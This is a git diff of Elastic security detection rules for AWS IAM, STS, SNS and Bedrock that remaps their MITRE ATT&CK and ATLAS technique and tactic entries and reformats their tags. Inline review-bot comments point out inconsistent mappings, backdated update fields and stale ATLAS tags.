diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml index 066335da0e3..f694877d86f 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -123,29 +123,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml index 25ef1309ea1..628f3841116 100644 --- a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/22" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" @@ -77,7 +77,15 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachRol risk_score = 21 rule_id = "f6d07a70-9ad0-11ef-954f-f661ea17fbcd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -92,29 +100,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.005" +name = "Temporary Elevated Cloud Access" +reference = "https://attack.mitre.org/techniques/T1548/005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml index 15745c5cb4d..4b9ab1316e7 100644 --- a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml +++ b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/22" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] 
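Review bot: T1548.005 Temporary Elevated Cloud Access describes just-in-time elevation mechanisms (time-bound access requests, approval-gated role assumption), whereas the `AttachRolePolicy` action this rule references attaches a customer-managed policy to a role permanently; the removed T1098.003 Additional Cloud Roles was the closer match and is what the AdministratorAccess-attached rules in this diff use for the same API family. Consider restoring `T1098.003` under TA0004, a pairing this diff already uses elsewhere. Dropping the Persistence entry and tag is fine if deliberate, but `updated_date` moving back to `2026/01/22` while the mapping changes looks like a rebase artifact.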
@@ -102,7 +102,15 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAM risk_score = 47 rule_id = "979729e7-0c52-4c4c-b71e-88103304a79f" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -117,39 +125,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" - -[[rule.threat.technique.subtechnique]] -id = "T1484.002" -name = "Trust Modification" -reference = "https://attack.mitre.org/techniques/T1484/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml index 8e13ad18bb8..bc91f308bb7 100644 
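Review bot: Removing the `TA0005` Defense Evasion `[[rule.threat]]` block leaves `T1484.002` Trust Modification mapped only under Privilege Escalation; ATT&CK lists T1484 under both tactics, and for an `UpdateSAMLProvider` change (per the `API_UpdateSAM…` reference in the hunk header) the evasion reading is the one the removed `"Tactic: Defense Evasion"` tag advertised to analysts. If the goal was only to stop repeating an identical technique block under two tactics, the tactic can be kept with the technique shared; if a one-tactic-per-rule policy is intended, a note in the PR description would stop reviewers re-adding it. The `[rule.investigation_fields]` context runs past the hunk.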
--- a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml +++ b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/22" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" @@ -75,7 +75,15 @@ references = ["https://labs.bishopfox.com/tech-blog/5-privesc-attack-vectors-in- risk_score = 21 rule_id = "a60326d7-dca7-4fb7-93eb-1ca03a1febbd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Privilege Escalation", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -89,39 +97,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml index 91424af9073..c65c86306e6 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/16" [rule] author = ["Elastic", "Austin Songer"] 
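Review bot: `+id = "T1078"` / `+id = "T1078.004"` (Valid Accounts: Cloud Accounts) describe the use of a cloud account, whereas this rule — judging by its file name and the removed mapping — fires on the `UpdateAssumeRolePolicy` call itself, i.e. on the trust-policy edit that grants the access; the removed `T1098.003` Additional Cloud Roles entry named that action directly. With the `AttachRolePolicy` rule earlier in this diff moved to `T1548.005`, the IAM write-path rules now land on different techniques for closely related API calls, so one stated rationale for the family, or keeping `T1098.003` here, would make the coverage map easier to defend. The `[[rule.threat]]` table starts inside this hunk and the `field_names` list continues past it.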
@@ -73,7 +73,16 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRol risk_score = 21 rule_id = "93075852-b0f5-4b8b-89c3-a226efae5726" severity = "low" -tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", +] timestamp_override = "event.ingested" type = "new_terms" @@ -100,21 +109,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.investigation_fields] field_names = [ "@timestamp", 
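Review bot: `+id = "T1548"` is added without the `T1548.005` Temporary Elevated Cloud Access sub-technique, although an STS `AssumeRole` by a service (see the `API_AssumeRol…` reference in the hunk header) is the textbook case for it; the same diff adds exactly that sub-technique to the `AttachRolePolicy` rule, strips it from privilege_escalation_role_assumption_by_user.toml and omits it in privilege_escalation_sts_role_chaining.toml, so the parent-only mapping looks accidental rather than a policy. Restoring the three `[[rule.threat.technique.subtechnique]]` lines for `T1548.005` under the Privilege Escalation entry would keep the AssumeRole rules consistent. Separately, the new Lateral Movement block ends with three bare `+` lines before `+[rule.threat.tactic]` (the by_user and sts_assume_root hunks carry the same run), which the repo's TOML serializer will presumably normalise — run it before merge.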
diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml index cd0e19ac332..0abf5a097d8 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/27" [rule] author = ["Elastic"] @@ -71,7 +71,16 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRol risk_score = 21 rule_id = "288a198e-9b9b-11ef-a0a8-f661ea17fbcd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -86,21 +95,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.005" -name = "Temporary Elevated Cloud Access" -reference = "https://attack.mitre.org/techniques/T1548/005/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml index ce86a7ec2d3..49cbe18daaf 100644 --- a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml +++ b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/24" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] 
@@ -161,21 +161,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.005" name = "Temporary Elevated Cloud Access" reference = "https://attack.mitre.org/techniques/T1548/005/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml index 5d7bc1dd47b..6e489d34aec 100644 --- a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml +++ b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/23" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] 
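Review bot: No `tags` hunk accompanies the new Persistence `[[rule.threat]]` entry (`+id = "TA0003"` / `+id = "T1098.003"`) in this file section, so unless the existing `tags` array already carries `"Tactic: Persistence"` — it is not visible here — this rule's tags and threat mapping now disagree, which is the exact mismatch every other file in this diff avoids by rewriting `tags` next to the mapping. If the tag is absent, add `"Tactic: Persistence"` to the array in the same commit. The hunk also leaves two bare `+` lines before the first `[rule.threat.tactic]` and three before the second; the `field_names` context continues past the hunk.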
@@ -89,7 +89,17 @@ references = [ risk_score = 47 rule_id = "ba5a0b0c-b477-4729-a3dc-0147c2049cf1" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -124,39 +134,41 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" [[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml index d4dcde5af1c..275e3f821a8 100644 
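Review bot: The Persistence entry added at the end of the hunk (`+[[rule.threat]]` … `+id = "TA0003"`) has no `[[rule.threat.technique]]` under it once `T1078.004` is removed, so the rule keeps the `"Tactic: Persistence"` tag from the preceding hunk while mapping no persistence technique; a tactic-only block may be schema-legal, but it contributes nothing to coverage and sits oddly beside the two entries in this file that do carry techniques. Either restore a technique under it (`T1078.004` Cloud Accounts, which this hunk removes, or `T1098.003` Additional Cloud Roles as the sts_assume_root hunk uses for the same tactic) or drop the entry together with the tag. The Privilege Escalation entry here is also parent-only `T1548` without `T1548.005`, like the role_assumption_by_service and by_user hunks. `[rule.new_terms]` context is unchanged past the hunk.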
--- a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml +++ b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/11" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -79,7 +79,16 @@ references = [ risk_score = 21 rule_id = "3c3f65b8-e8b4-11ef-9511-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Resources: Investigation Guide", "Use Case: Threat Detection"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS SNS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Resource Development", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "new_terms" @@ -93,21 +102,33 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1608" +name = "Stage Capabilities" +reference = "https://attack.mitre.org/techniques/T1608/" + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1496" name = "Resource Hijacking" reference = "https://attack.mitre.org/techniques/T1496/" - [[rule.threat.technique.subtechnique]] id = "T1496.004" name = "Cloud Service Hijacking" reference = "https://attack.mitre.org/techniques/T1496/004/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml b/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml index 342420cbf1c..a500a627229 100644 
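Review bot: The new `+id = "TA0042"` Resource Development entry with `+id = "T1608"` Stage Capabilities is a strained fit for an SNS topic created inside the monitored account by a rare user: ATT&CK scopes Resource Development to what an adversary sets up on infrastructure they control before targeting, and the Impact entry this hunk keeps (`T1496.004` Cloud Service Hijacking) already captures the misuse case. If the intent is to treat the topic as attacker-staged infrastructure within the victim account, a sentence in the rule description or PR explaining that reading would keep the coverage map from being corrected back later; the query itself is outside the hunk, so I cannot tell what creation pattern it actually matches. Minor: `+[rule.threat.tactic]` for TA0042 runs straight into `+[[rule.threat]]` with no separating blank line while the Impact block gains one — the serializer should be run on this file too.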
--- a/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/25" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -67,7 +67,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Defense Evasion", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", +] timestamp_override = "event.ingested" type = "esql" 
@@ -99,41 +107,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_invocations_no_guardrails_count desc ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0094" -name = "Delay Execution of LLM Instructions" -reference = "https://atlas.mitre.org/techniques/AML.T0094/" - -[rule.threat.tactic] -id = "AML.TA0007" -name = "Defense Evasion" -reference = "https://atlas.mitre.org/tactics/AML.TA0007/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml index 2f835ffd183..b4749c143ba 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_by_single_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] 
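Review bot: With every `[[rule.threat]]` table deleted from aws_bedrock_execution_without_guardrails.toml, the rule's only remaining framework references are the free-text `"Mitre Atlas: T0051"` / `"Mitre Atlas: T0054"` tags kept in the preceding hunk — and those IDs never matched the structured mapping being removed here (`AML.T0040`, `AML.T0094`, plus ATT&CK `T1562`), so the tags were already stale and are now unverifiable by anything that walks `rule.threat`. The same deletion repeats in the hunks for guardrails_multiple_violations_by_single_user (`AML.T0015` removed, tags say T0051/T0054), multiple_violations_in_single_request, high_confidence_misconduct_blocks (`AML.T0051`, the one file where tag and mapping agreed), high_resource_consumption (`T1020`, `T1499.003`, `AML.T0040`, `AML.T0024`, `AML.T0046`), multiple_attempts_to_use_denied_models, multiple_sensitive_information_policy_blocks, multiple_topic_policy_blocks, multiple_validation_exception_errors and multiple_word_policy_blocks. If the motivation is that ATLAS tactics share display names with ATT&CK ones (`"Defense Evasion"` appears under both frameworks in this very hunk) and that trips a tag/tactic consistency check, qualifying the check by `framework` is the fix; stripping all ATT&CK and ATLAS coverage from the LLM rules should not be the side effect of a test change. At minimum the surviving `Mitre Atlas:` tags should be corrected to the `AML.T…` IDs or removed together with the mapping so the two do not contradict each other.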
@@ -68,7 +68,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Defense Evasion", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", +] timestamp_override = "event.ingested" type = "esql" @@ -99,15 +107,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_violations_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0015" -name = "Evade AI Model" -reference = "https://atlas.mitre.org/techniques/AML.T0015/" - -[rule.threat.tactic] -id = "AML.TA0007" -name = "Defense Evasion" -reference = "https://atlas.mitre.org/tactics/AML.TA0007/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml index cccd06e4041..1ea547c91c7 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_guardrails_multiple_violations_in_single_request.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/10" [rule] author = ["Elastic"] 
